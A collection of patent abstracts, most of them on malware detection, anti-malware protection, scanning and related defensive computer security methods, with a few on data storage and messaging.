Abstract: Data is received or accessed that includes a structured file encapsulating data required by an execution environment to manage executable code wrapped within the structured file. Thereafter, code and data regions are iteratively identified in the structured file. Such identification is analyzed so that at least one feature can be extracted from the structured file. Related apparatus, systems, techniques and articles are also described.

Abstract: In an embodiment, a data processing method comprises, in a computer executing a supervisor program: the supervisor program establishing a plurality of different memory access permissions comprising any combination of read, write, and execute permissions for one or more different regions of memory of a first domain; setting the memory access permissions of a first set of the regions of memory to execute only; in response to a request from a process to read or write a particular region of memory in the first set, performing one or more responsive actions that prevent the process from reading or modifying one or more instructions or one or more embedded immediate values of the particular region of memory. Embodiments provide selective access to executable memory.

Abstract: A method performed by a computer system determines propagation relationships of Trojan horse files. A current Trojan horse file is stored into a corresponding current level of a propagation relationship tree. A condition of the current Trojan horse file or of the propagation relationship tree is assessed. The following steps are repeated until the condition is satisfied: search Trojan horse files for a parent, child or sibling relative to the current Trojan horse file, identify one of the Trojan horse files as the current Trojan horse file, and store the current Trojan horse file into a corresponding current level of the propagation relationship tree. When the condition is satisfied, the propagation relationship tree is displayed. The storing of the current Trojan horse file may include storing an identifier of the current Trojan horse file, which may include data abstraction output, and/or a downloading address of the current Trojan horse file.

Abstract: The present disclosure relates to a method, a device and a storage medium for processing virus which can automatically distinguish which of processing mode is best for the current status of the electronic apparatus. The method includes: detecting a virus scan operation; in response to the virus scan operation, determining whether conditions (i) and (ii) are true, wherein the condition (i) is true when a time interval between a last time of processing virus using a first virus processing mode and the current time is larger than a preset interval, the condition (ii) is true when at least one of risk situations exist during a time period between the last time of processing virus using the first virus processing mode and the current time; if one of conditions (i) and (ii) being true, calling the first virus processing mode to scan files in the electronic apparatus.

Abstract: The present invention relates to the security of general purpose computing devices, such as laptop or desktop PCs, and more specifically to the detection of malicious software (malware) on a general purpose computing device. A challenge in detecting malicious software is that files are typically scanned for the presence of malicious intent only once (and subsequent rescanning is typically performed in a simplistic manner). Existing methods in the art do not address how to most effectively rescan collections of files in a way that tries to optimize performance and efficacy. Accordingly we present novel methods, components, and systems for intelligently rescanning file collections and thereby enabling retroactive detection of malicious software and also retroactive identification of clean software. These methods may also be useful if additional information is now available regarding a file that might be useful to an end-user or an administrator, even though the file's core disposition might not have changed.

Abstract: Technologies are described herein for anti-malware support within firmware. Through the utilization of the technologies and concepts presented herein, malicious software protection may be extended down to the firmware level. Detecting malicious firmware or software, removing it from firmware, and actively preventing it from exploiting known security vulnerabilities may be supported. Application level anti-malware software may interface with, and be supported by, one or more firmware level anti-malware modules. Firmware level anti-malware modules can actively prevent malicious software from affecting the system firmware. For example, the anti-malware modules may monitor or block access to the firmware. Anti-malware modules may be available at both boot-time and run-time. Thus, a wider range of malicious software attacks or infiltrations may be mitigated.

Abstract: One or more relevant scanners used to identify asset vulnerabilities are identified, obtained, and logically arranged for deployment on an asset in accordance with a vulnerability management policy and a scanner deployment policy such that the relevant scanners are deployed at, or before, a determined ideal time to minimize the resources necessary to correct the vulnerabilities, if found. The relevant scanners are then automatically deployed in accordance with the scanner deployment policy and, if a vulnerability is identified, one or more associated remedies or remedy procedures are applied to the asset. At least one of the one or more relevant scanners are then re-deployed on the asset to determine if the identified vulnerability has been corrected and, if the vulnerability is not corrected at, or before, a defined time, protective measures are automatically taken.

Abstract: A system and method for non-retained electronic messaging is described. In one embodiment, the system includes a message receiver module, a message storing and identifier generation module, a message retrieval module and an expunging module. The message receiver module receives a message. The message storing and identifier generation module stores the message in a non-transitory, non-persistent memory of one or more computing devices, generates a message identifier and sends the message identifier to a recipient device. The message retrieval module receives a selection of the message identifier from the recipient device, retrieves the message from the non-transitory, non-persistent memory, and sends the message to the recipient device for presentation. The expunging module expunges the message from the one or more devices responsive to sending the message to the recipient device for presentation.

Abstract: Approaches for an operating system to ascertain whether files stored its file system have been deemed trustworthy. When an operating system receives a request to perform an operation involving a file that is stored within the file system maintained by the operating system, the operating system requests the file from a driver. In turn, the driver consults a set of trust data to identify whether the file has been previously deemed trustworthy. Upon the driver determining that the file has been deemed trustworthy, the driver provides the file to the operating system in a first format. On the other hand, upon the driver determining that the file has not been deemed trustworthy, the driver provides the file to the operating system in a second format that is different than the first format. Advantageously, the file is stored in a single format in the file system.

Abstract: Techniques for identifying misleading applications are disclosed. In one particular exemplary embodiment, the techniques may be realized as a method for identifying misleading applications comprising receiving a request for network data, parsing the request for network data, using a processor, to determine if one or more portions of the request match a suspicious indicator, identifying the suspicious indicator without using a known malware domain or a known malware signature, and performing a specified action in the event one or more portions of the request match a suspicious indicator.

Abstract: A method for preventing malware attacks includes the steps of detecting an attempt on an electronic device to access a task scheduler, determining an entity associated with the attempt to access the task scheduler, determining a malware status of the entity, and, based on the malware status of the entity, allowing or denying the attempted access to the task scheduler. The task scheduler is configured to launch one or more applications at a specified time or interval.

Abstract: A computer-implemented method for protecting document files from macro threats may include (1) identifying a document file that contains an embedded macro, (2) locating an event-driven programming language module that stores the embedded macro for the document file, and (3) cleaning the event-driven programming language module by removing procedures for the embedded macro within the event-driven programming language module and retaining variable definitions within the event-driven programming language module. Various other methods, systems, and computer-readable media are also disclosed.

Abstract: A method and system for providing a guest with virtual media that can be read by the guest. A hypervisor hosted by a computer system presents a guest-to-host channel to a guest in the computer system. The hypervisor receives content from the guest via the guest-to-host channel, the content to be stored and managed by the hypervisor in a memory area associated with the guest in the computer system, the memory area not being directly accessible to the guest. The hypervisor then receives a request from the guest indicating that the guest is to perform at least one operation on the content, and provides the content for the guest to perform the at least one operation.

Abstract: Disclosed is a method of operating a data storage system. The method comprises identifying changed segments of a primary storage volume, receiving a data request for a plurality of data items in a secondary storage volume, identifying changed data items of the plurality of data items in the secondary storage volume based on a correspondence between the plurality of data items in the secondary storage volume and the changed segments of the primary storage volume, and transferring the changed data items in response to the data request.

Abstract: Provided are an anti-malware system, and an operating method thereof. The anti-malware system matches an filtering operation on first target data to be filtered with a rule pattern, performs a filtering operation on the first target data according to a matching result, matches second target data to be malware-scanned with a malware pattern, and performs a malware scanning operation on the second target data according to a matching result, wherein the filtering operation and the scanning operation are performed on a system-on-chip (SoC).

Abstract: A system and method for preventing malware attacks on mobile devices is presented. A server receives data from a mobile communications device and applies, by a known good component, logic on the data to determine if the data is safe. When the data is determined as being safe, the data is allowed to be processed by the mobile communications device. When the data is determined as not safe, a known bad component applies logic on the data to determine if the data is malicious. The data is rejected from being processed by the mobile communications device when the data is determined as being malicious. When the data is not malicious, a decision component performs an analysis on the data. If decision component determines the data to be safe, the data is allowed to be processed by the mobile communications device. Otherwise, the data is rejected from being processed.

Abstract: A method includes assigning unique guest identifications to different guests, specifying an address region and permissions for the different guests and controlling a guest jump from one physical memory segment to a second physical memory segment through operational permissions defined in a root memory management unit that supports guest isolation and protection.

Abstract: A computer-implemented method for sharing the results of malware scans within networks may include (1) identifying a set of files stored on a set of client devices within a network, (2) obtaining a set of copies of the files stored on the client devices within the network, (3) performing a malware scan on the copies of the files, (4) generating a result of the malware scan performed on the copies of the files, and then (5) sharing the result of the malware scan with at least a subset of the client devices within the network to enable the subset of client devices to use the result of the malware scan instead of each performing an additional malware scan that is at least partially redundant to the malware scan performed on the copies of the files. Various other methods, systems, and computer-readable media are also disclosed.

Abstract: A system and method of record matching using regular expressions and finite state representations. In this manner, the time (or computational effort) involved in record matching is reduced.

Abstract: Systems, methods, and media for recovering an application from a fault or an attack are disclosed herein. In some embodiments, a method is provided for enabling a software application to recover from a fault condition. The method includes specifying constrained data items and assigning a set of repair procedures to the constrained data items. The method further includes detecting a fault condition on the constrained data items during execution of the software application, which triggers at least one repair procedure. The triggered repair procedures are executed and the execution of the software application is restored. In some embodiments, the restoring comprises providing memory rollback to a point of execution of the software application before the fault condition was detected.

Abstract: The various aspects provide a method for recognizing and preventing malicious behavior on a mobile computing device before it occurs by monitoring and modifying instructions pending in the mobile computing device's hardware pipeline (i.e., queued instructions). In the various aspects, a mobile computing device may preemptively determine whether executing a set of queued instructions will result in a malicious configuration given the mobile computing device's current configuration. When the mobile computing device determines that executing the queued instructions will result in a malicious configuration, the mobile computing device may stop execution of the queued instructions or take other actions to preempt the malicious behavior before the queued instructions are executed.

Abstract: Systems and methods for obfuscating user data in a remote web-based application are disclosed. According to one method, user inputs to a displayed web page of the remote web-based application are received at a first web browser that is used by the user, wherein at least a portion of the user inputs comprise user-inputted data intended to be stored at the web-based application. The user inputs are transmitted to a management component that is configured to interact with a second web browser that communicates with the web-based application. The management component obfuscates at least a portion of the user-inputted data and forwards the obfuscated and un-obfuscated portions of the user inputs to the second web browser, which correspondingly transmits the obfuscated and un-obfuscated portions of the user inputs to the remote web-based application.

Abstract: System and methods for connection processing with limited data leakage. The system records state associated with a connection request in a connection state engine, records state associated with a connection acknowledgement in the connection state engine, stores data sent after the connection acknowledgement in a buffer and determines, without a proxy, whether to allow or deny a connection as a function of the data stored in the buffer.

Abstract: A computer-implemented method for profiling a web application. A web page containing JavaScript (JS) is crawled. At least a portion of the JS is extracted from the crawled web page. An automated simulation of the extracted JS is executed.

Abstract: Adware and viruses are examples of objects that may be embedded in a web page or linked to a web page. When such an object is detected to be associated with a web page loading on a browser, an analysis may be performed to determine a trust level for the object. The object is suppressed based on the trust level. A prompt is displayed to advise a user that the object has been suppressed, and to provide an opportunity to interactively accept or decline activation of an action for the object.

Abstract: An on-premise computer in the form of an on-premise gateway receives data transmitted by a client to an intended destination server. The on-premise gateway and the client are on-premise within the same private computer network. The on-premise gateway determines whether or not the data is to be scanned for security checks by a cloud scanning service provided by a cloud scanner on the Internet. The on-premise gateway redirects the data to the cloud scanner when the data is to be scanned in the cloud. Otherwise, when the data is not to be scanned in the cloud, the on-premise gateway forwards the data to the destination server without having the data scanned by the cloud scanner.

Abstract: An owner of sensitive data is provided with a notification that the sensitive data has been located. To achieve this, the sensitive data is first modified to include one or more data strings that may appear to be suspect but are otherwise benign. These data strings, which are referred to herein as benign pseudo virus signatures (BPVSs), preferably are embedded throughout a piece of sensitive data according to a frequency distribution. When the sensitive data is examined by virus checking software, the benign pseudo virus signatures are detected as potential computer viruses. By using information associated with the signatures, the owner is identified, preferably using the assistance of an intermediary entity that acts as a registry for the BPVSs. Once the owner is identified, a notification is provided to the owner that the sensitive data has been located. Appropriate remedial action can then be taken.

Abstract: Updating a central repository with information about malware resident upon a computer system. Upon detecting the malware executing in a virtual machine, a software module, without manual instruction, sends malware manifest data to a central repository over a network. The malware manifest data may comprise a copy of the malware and data identifying or comprising a set of files infected by the malware. The central repository may receive, over a network from at least two computer systems, distinct sets of malware manifest data and may subsequently store the sets of malware manifest data.

Abstract: Novel methods, components, and systems for detecting malicious software in a proactive manner are presented. More specifically, we describe methods, components, and systems that leverage machine learning techniques to detect malicious software. The disclosed invention provides a significant improvement with regard to detection capabilities compared to previous approaches.

Abstract: Methods, system, and media for determining similar malware samples are disclosed. Two or more malware samples are received and analyzed to extract information from the two or more malware samples. The extracted information is converted to a plurality of sets of strings. A similarity between the two or more malware samples is determined based on the plurality of the sets of strings.

Abstract: Preventing execution of viruses or malware on a computing device includes compiling an inventory recordation of legitimate applications and terminating execution of any application not on the inventory recordation while in a protected mode. An instantaneous and unprompted inventory recordation known as a “snapshot” can be performed by the computer program. A user may further train the computer program to identify legitimate applications routinely accessed by the user and to be updated to the inventory recordation, such that the inventory recordation is personal to the user. After training, the protected mode can be activated. A smart icon graphical user interface is utilized, that automatically toggles between locked and unlocked depending on if the computing device is at risk or not, to place the computing device in a protected or unprotected mode.

Abstract: Some embodiments provide firewalls and methods for guarding against attacks by leveraging the Document Object Model (DOM). The firewall renders the DOM tree to produce a white-list rendering of the data which presents the non-executable elements of the data and, potentially, outputs of the executable elements of the data without the executable elements that could be used to carry a security threat. Some embodiments provide control over which nodes of the DOM tree are included in producing the white-list rendering. Specifically, a configuration file is specified to white-list various nodes from the DOM tree and the white-list rendering is produced by including the DOM tree nodes that are specified in the white-list of the configuration file while excluding those nodes that are not in the white-list. Some embodiments provide a hybrid firewall that executes a set of black-list rules over white-listed nodes of the DOM tree.

Abstract: Systems and methods for intercepting computing device system calls for a computing device including a kernel having a system call table. A hypervisor is executed on the computing device, the hypervisor configured to control at least one of the computing device processor registers. At least one modified kernel structure is created, the modified kernel structure including a modified system call table. A memory address of an original system call handler is determined, the original system call handler configured to receive kernel operation commands. A size of a loaded image of the original system call handler is determined. A copy of the original system call handler as a second system call handler is created, and the second system call handler intercepts a computing device system call.

Abstract: Methods, devices and systems for monitoring behaviors of a mobile computing device include observing in a non-master processing core a portion of a mobile device behavior that is relevant to the non-master processing core, generating a behavior signature that describes the observed portion of the mobile device behavior, and sending the generated behavior signature to a master processing core. The master processing core combines two or more behavior signatures received from the non-master processing cores to generate a global behavior vector, which may be used by an analyzer module to determine whether a distributed software application is not benign.

Abstract: An example embodiment of the present invention provides an apparatus including at least one processor; and at least one memory including executable instructions, the at least one memory and the executable instructions being configured to, in cooperation with the at least one processor, cause the apparatus to perform at least the following: retrieving, from a reputation server, reputation data of uniform resource locators (URL) of one or more web sites relating to one or more web site features that are available via the web site; and determining executable web site features on the basis of the retrieved reputation data.

Abstract: Systems and methods for abusive email account detection and transmission of a signed response to an abusive email account owner and provider. The methods include receiving an email from a first email account on a second email account, wherein the email contains malicious content, determining if a trust relationship exists between a first email server corresponding to the first email account and a second email server corresponding to the second email account, and transmitting, using a hardware processor of the second email server, an alert email to the first email account corresponding to the trust relationship, wherein the alert email includes a digital signature and a secure field having an abusive category descriptor in an email header. The secure field may include an abusive category descriptor, for example transmitting spam, transmitting malware, transmitting phishing attempts, and committing fraud.

Abstract: The disclosed computer-implemented method for detecting malware using file clustering may include (1) identifying a file with an unknown reputation, (2) identifying at least one file with a known reputation that co-occurs with the unknown file, (3) identifying a malware classification assigned to the known file, (4) determining a probability that the unknown file is of the same classification as the known file, and (5) assigning, based on the probability that the unknown file is of the same classification as the known file, the classification of the known file to the unknown file. Various other methods, systems, and computer-readable media are also disclosed.

Abstract: Disclosed are systems and methods for limiting the operation of trusted applications in presence of suspicious programs. An example method includes: identifying one or more trusted applications installed on a computer; collecting data about applications and programs installed on the computer; checking for the presence of one or more suspicious programs using suspicious program detection rules, wherein a program is considered to be suspicious when it can access protected information of a trusted application without authorization; and when at least one suspicious program is found, limiting the operation of the trusted application until the suspicious program is terminated or removed from the computer.

Abstract: Systems and methods for providing anti-malware protection on storage devices are described. In one embodiment, a storage device includes a controller, firmware, and memory. The firmware communicates with an authorized entity (e.g., external entity, operating system) to establish a secure communication channel. The system includes secure storage to securely store data.

Abstract: Systems, methods, and computer-readable media for detecting threats on a network. In an embodiment, target network traffic being transmitted between two or more hosts is captured. The target network traffic comprises a plurality of packets, which are assembled into one or more messages. The assembled message(s) may be parsed to generate a semantic model of the target network traffic. The semantic model may comprise representation(s) of operation(s) or event(s) represented by the message(s). Score(s) for the operation(s) or event(s) may be generated using a plurality of scoring algorithms, and potential threats among the operation(s) or event(s) may be identified using the score(s).

Abstract: The present invention relates to means for detecting malware. The method is realized on a computer with an operating system (OS) installed thereon, and comprises a step in which a point of interrupt is established when a system call is made by a user application requesting the transfer of control via an address in the kernel of the loaded OS. Next, the data structure of the loaded OS is checked. As this check is carried out, the address of the command in the random-access memory of the computer, by means of which command control will be transferred during the system call, is determined and the addresses of the commands to be executed during the system call are checked to see if they belong to the normal range of addresses of the OS kernel and OS kernel modules in the random-access memory. The presence of malware is then detected in the event that a command address does not belong to the normal range of addresses.

Abstract: The present invention relates to an active defense method based on cloud security comprising: a client collecting and sending a program behavior launched by a program thereon and/or a program feature of the program launching the program behavior to a server; with respect to the program feature and/or the program behavior sent by the client, the server performing an analysis and comparison in its database, making a determination on the program based on the comparison result, and feeding back to the client; based on the feedback determination result, the client deciding whether to intercept the program behavior, terminate execution of the program and/or clean up the program, and restore the system environment. The invention introduces a cloud security architecture, and employs a behavior feature based on active defense to search and kill a malicious program, thereby ensuring network security.

Abstract: A security device may receive information identifying a set of conditions for providing countermeasure code to a client device. The security device may receive information identifying an action to be performed when the countermeasure code is executed by the client device, and may determine the countermeasure code to be provided to the client device when the set of conditions is satisfied. The security device may receive a request from the client device, and may determine a response to the request. The response may include response code for serving content of a web page to the client device. The security device may determine that the set of conditions has been satisfied, and may insert the countermeasure code into the response code. The security device may provide the response code and the countermeasure code to the client device, and the countermeasure code may cause the client device to perform the action.

Abstract: A computer-implemented method for scanning packed programs in response to detecting suspicious behaviors may include (1) executing a packed program that may include (i) malicious code that has been obfuscated within the packed program and (ii) unpacking code that deobfuscates and executes the malicious code when the packed program is executed, (2) monitoring, while the packed program is executing, how the packed program behaves, (3) detecting, while monitoring how the packed program behaves, a suspicious behavior of the malicious code that indicates that the unpacking code has deobfuscated and executed the malicious code, and (4) performing a security operation on the packed program in response to detecting the suspicious behavior of the malicious code. Various other methods, systems, and computer-readable media are also disclosed.

Abstract: Devices, systems, and methods are disclosed. An agent resides in a mobile communication device. The agent detects Proximity-based Mobile Malware Propagation. The agent injects one or more trigger network connections in the candidate connection list. These connections appear as legitimate networks and devices, but instead trigger connection to an agent server on a service provider's network. By attempting to connect through the trigger network connection, the malware reveals itself. The system helps collect the malware signature within a short period of time after the malware outbreak in local areas, though such attacks typically bypass network based security inspection in the network.

Abstract: A method for determining security information of an unknown file in a cloud security system is provided. The method includes: a cloud security serving end receives file security querying information reported by a cloud client end when a preconfigured monitoring point is triggered, wherein the file security querying information comprises identifier information and behavior information of a file; creates a behavior sequence of the file within a lifecycle according to the file security querying information of the file, analyzes the behavior sequence of the file within the lifecycle, and determines file security information of the file according to an analyzed result.

Abstract: A computer-implemented method for using user-input information to identify computer security threats may include (1) detecting activity at a computing system, (2) determining whether a user provided input at the computing system when the activity occurred, (3) determining that the activity indicates a potential security threat based at least in part on whether the user provided input at the computing system when the activity occurred, and (4) performing a security action on the activity in response to the determination that the activity indicates a potential security threat. Various other methods, systems, and computer-readable media are also disclosed.

Abstract: Systems and methods for providing features that enable anti-malware protection on storage devices are described. In one embodiment, a storage device includes a controller, firmware, and memory. The controller manages input/output operations for the storage device. The firmware provides features for protection against malware. The memory includes secure storage that is configured to provide a set of storage operations.

Abstract: Methods and devices for detecting performance-degrading behaviors include identifying a data source component that inputs data into an application executing on a mobile device, and identifying a data sink component that consumes data output from the application. Using a measured runtime control-flow parameter, a likelihood that the data source component is a critical data resource may be determined. Using the probability value, a behavior model that identifies a mobile device feature associated with the critical data resource may be updated and used to determine whether the software application is malicious. Measured runtime control-flow parameters may include a program execution distance between data source and sink components based on heuristics.

Abstract: Various embodiments provide methods, apparatus, and computer readable medium for determining a malicious program. In an exemplary method, a specific application programming interface (API) within an application program can be obtained. Call logic for calling the specific API can be determined. The call logic can include a triggering event to trigger the specific API to be called, a feedback path provided after the specific API is called, or a combination thereof. Whether the application program is a malicious program can be determined according to the call logic.